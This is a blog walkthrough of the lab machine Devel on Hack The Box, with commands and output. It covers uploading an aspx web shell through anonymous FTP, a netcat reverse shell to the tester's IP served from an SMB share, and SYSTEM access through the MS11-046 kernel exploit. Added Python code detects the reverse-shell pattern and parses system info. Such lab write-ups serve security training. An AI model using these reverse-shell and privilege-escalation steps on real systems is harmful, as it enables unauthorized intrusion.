TJ_Null’s OSCP Prep – HTB – Devel

One of my weakest links in penetration testing is Windows privilege escalation, and I had a lot of trouble escalating privileges on this box. Anyway, this box had two ports open, 21 and 80. FTP allowed anonymous login and the share was writeable. The FTP root pointed at the webserver's directory, so getting a reverse shell on this box was easy. Rooting it was easy as well, since many KBs were missing.


Enumeration

I start with an Nmap scan. Ports 21 and 80 were open. The webserver had nothing interesting on it; it just showed the default IIS page. The interesting port is FTP, which allows anonymous login.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# cat nmap.result
# Nmap 7.92 scan initiated Wed Jan 12 15:22:48 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.054s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 12 15:23:09 2022 -- 1 IP address (1 host up) scanned in 21.33 seconds

FTP

Logging in to FTP.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:aghanim): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Dir bruteforce – ferox

Nothing interesting in any of the DIRs. Doing a quick feroxbuster scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# feroxbuster --url http://10.10.10.5/aspnet_client --depth 3 -f

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.4.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.5/aspnet_client
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦑  User-Agent            │ feroxbuster/2.4.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🪓  Add Slash             │ true
 🔃  Recursion Depth       │ 3
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403       29l       92w     1233c http://10.10.10.5/aspnet_client/system_web/
[####################] - 33s    59998/59998   0s      found:1       errors:0      
[####################] - 21s    29999/29999   1422/s  http://10.10.10.5/aspnet_client
[####################] - 22s    29999/29999   1355/s  http://10.10.10.5/aspnet_client/system_web/

So it looks like the FTP server is sharing the webserver's directory. We can try to upload a file to see whether we have write permission.

ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp> 

Since we have write permission, we can upload a web shell through FTP. I'll use the one that ships with Kali, /usr/share/davtest/backdoors/aspx_cmd.aspx, and then visit /cmd.aspx on the website.

And we have command execution.

Initial Access

impacket-smbserver.py

Since this is a Windows box, it does not have netcat installed natively. What we will do is set up an SMB share using Impacket's smbserver.py and serve nc.exe from it.

So first, create a share and start smbserver.py from the directory where nc.exe is located.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/devel]
└─# smbserver.py share /home/aghanim/Desktop/HTB/devel
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Now, start a netcat listener. I'll use rlwrap because this is a Windows target.

From my previous TryHackMe notes:

rlwrap gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell. Some manual stabilization is still needed if you want to use Ctrl+C. It is not installed by default.

Syntax for rlwrap:

rlwrap nc -lvnp

This technique is very useful when dealing with Windows shells, as they tend to be very difficult to stabilize.

https://blog.aghanim.net/?p=1043

So we'll use that command. Run the following on the webserver to get a reverse shell.

\\10.10.14.17\share\nc.exe -e cmd.exe 10.10.14.17 4444

Looking at our listener we have a connection.

┌──(root💀kali)-[/home/aghanim]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.5] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
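The hop above, an IIS worker spawning a command shell that runs nc.exe straight off a remote SMB share, is easy to spot in process-creation telemetry. The following is an added example of that triage logic over constructed Sysmon-style events; it is not part of the original post, and the field names Image, ParentImage and CommandLine are assumed.

```python
# Added example: flag the web-shell-to-reverse-shell pattern from this box in
# simplified Sysmon Event ID 1 records. Field names are assumed; events are constructed.
import re
from typing import Dict, List

UNC_RE = re.compile(r"\\\\\d{1,3}(?:\.\d{1,3}){3}\\")  # \\10.10.14.17\share style path

WEB_WORKERS = {"w3wp.exe"}                 # IIS worker process
SHELLS = {"cmd.exe", "powershell.exe"}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like a web shell launching a reverse shell."""
    reasons = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event["CommandLine"]
    if parent in WEB_WORKERS and image in SHELLS:
        reasons.append("IIS worker spawned a command shell")
    if UNC_RE.search(event["Image"]) or UNC_RE.search(cmdline):
        reasons.append("binary executed from a UNC path on another host")
    if image == "nc.exe" and re.search(r"(^|\s)-e\s", cmdline):
        reasons.append("netcat launched with -e (shell bound to socket)")
    return reasons

# Constructed sample events modelled on this box; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"cmd.exe /c \\10.10.14.17\share\nc.exe -e cmd.exe 10.10.14.17 4444"},
    {"Image": r"\\10.10.14.17\share\nc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"\\10.10.14.17\share\nc.exe -e cmd.exe 10.10.14.17 4444"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},          # benign: user opened a shell
]

def run_triage(events: List[Dict[str, str]]):
    """(image, reasons) for every event that trips at least one rule."""
    return [(basename(e["Image"]), triage(e)) for e in events if triage(e)]
```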

Enumerate the machine

Doing some enumeration on the Windows box. Running the systeminfo command gives us some information about the machine: it is a Windows 7 box, it is x86-based even though the CPU is x64, and the installed KBs show N/A. That is interesting, as there may be vulnerabilities we can abuse.

systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 οΏ½οΏ½
System Boot Time:          14/1/2022, 9:14:06 οΏ½οΏ½
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.440 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.508 MB
Virtual Memory: In Use:    633 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::24c

Trying to list the available KBs, I couldn't find anything. Maybe no KBs have been installed.

wmic qfe get Caption,Description,HotFixID,InstalledOn
No Instance(s) Available.

There are also two users, Administrator and babis.

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babis                    Guest                    
The command completed with one or more errors.

Privilege Escalation

Watson

I will use rasta-mouse's Watson script to search for missing KBs and vulnerabilities. There are, however, a couple of things that need to be done before we're able to run it.

  1. The script targets Windows 10. There are, however, older commits of Watson we can use.
  2. We need to know the .NET version of the machine.
  3. We need to compile Watson with the correct parameters using Visual Studio. As I don't have that installed on my Kali, I'll use my Windows host.

Find the .NET version of the machine

So first, let's find out the .NET version of the machine. We can use this command.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

And the output.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

c:\windows\system32\inetsrv>

Compile the correct version with Visual Studio

So this machine uses .NET 3.5.
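The two outputs above contain everything needed to choose the Watson build settings by hand. As an added example (my own code, not the post's or Watson's), this script derives the same settings, platform x86 and target .NET Framework 3.5, from trimmed copies of the systeminfo and reg query output, and also flags the empty hotfix list.

```python
# Added example: derive the Watson build settings and the "no hotfixes" finding
# from trimmed copies of this box's systeminfo and reg query output. Parsing is mine.
import re
from typing import Dict

SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Hotfix(s):                 N/A
"""

NDP_QUERY = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v2.0.50727
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v3.0
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v3.5
"""

def parse_systeminfo(text: str) -> Dict[str, str]:
    """Map 'Key: value' lines to a dict; indented continuation lines are skipped."""
    fields = {}
    for line in text.splitlines():
        if not line or line[0].isspace() or ":" not in line:
            continue
        key, value = line.split(":", 1)
        fields[key.strip()] = value.strip()
    return fields

def highest_ndp_version(reg_output: str) -> str:
    """Pick the newest vX.Y subkey under ...\\NDP (trailing build digits ignored)."""
    versions = [(int(a), int(b)) for a, b in re.findall(r"\\NDP\\v(\d+)\.(\d+)", reg_output)]
    if not versions:
        raise ValueError("no NDP subkeys found")
    major, minor = max(versions)
    return f"{major}.{minor}"

def build_plan(systeminfo: str, reg_output: str) -> Dict[str, object]:
    """The settings the post applies by hand in Visual Studio, plus the hotfix gap."""
    info = parse_systeminfo(systeminfo)
    build = int(re.search(r"Build (\d+)", info["OS Version"]).group(1))
    return {
        "platform": "x86" if info["System Type"].upper().startswith("X86") else "x64",
        "target_framework": f".NET Framework {highest_ndp_version(reg_output)}",
        "os_build": build,
        "no_hotfixes": info.get("Hotfix(s)", "").upper() == "N/A",
    }
```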

Download the version of Watson that runs on Windows 7 and open Watson.sln in Visual Studio.

Go to Watson –> Properties and change the Target Framework to .NET Framework 3.5.

Then, go to Build –> Configuration Manager and change the platform to x86.

Lastly, go to Build –> Build Watson.

And the output should be:

I transferred the file to my Kali machine using a Python HTTP server and, as I did earlier with nc.exe, ran it from the SMB share.

\\10.10.14.17\share\Watson.exe
  __    __      _                   
 / / /\ \ \__ _| |_ ___  ___  _ __  
 \ \/  \/ / _` | __/ __|/ _ \| '_ \ 
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                                   
                           v0.1    
                                   
                  Sherlock sucks...
                   @_RastaMouse

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Processs IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

  [*] Appears vulnerable to MS10-073
   [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
   [>] Exploit: https://www.exploit-db.com/exploits/36327/
   [>] Notes: None.

  [*] Appears vulnerable to MS10-092
   [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
   [>] Notes: None.

  [*] Appears vulnerable to MS11-046
   [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
   [>] Exploit: https://www.exploit-db.com/exploits/40564/
   [>] Notes: None.

  [*] Appears vulnerable to MS12-042
   [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
   [>] Exploit: https://www.exploit-db.com/exploits/20861/
   [>] Notes: None.

  [*] Appears vulnerable to MS13-005
   [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
   [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
   [>] Notes: None.

 [*] Finished. Found 5 vulns :)

c:\windows\system32\inetsrv>

MS11-046

Right off the bat I can see there is a privilege escalation vulnerability on this machine.

Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.

I used the precompiled exe from Windows-Kernel-Exploits and ran it on the target machine.

\\10.10.14.17\share\MS11-046.exe

whoami
nt authority\system

What I’ve learned

  • Always enumerate harder, as they say. Try not to assume too much; instead, get verification that the system is vulnerable.
  • Not all scripts will work out of the box. Some will have to be tweaked to work on the target machine.
  • When compiling scripts for Windows, always check the target OS architecture.
  • rlwrap is better to use than plain netcat when the target is Windows.
  • I really need to build a good methodology.
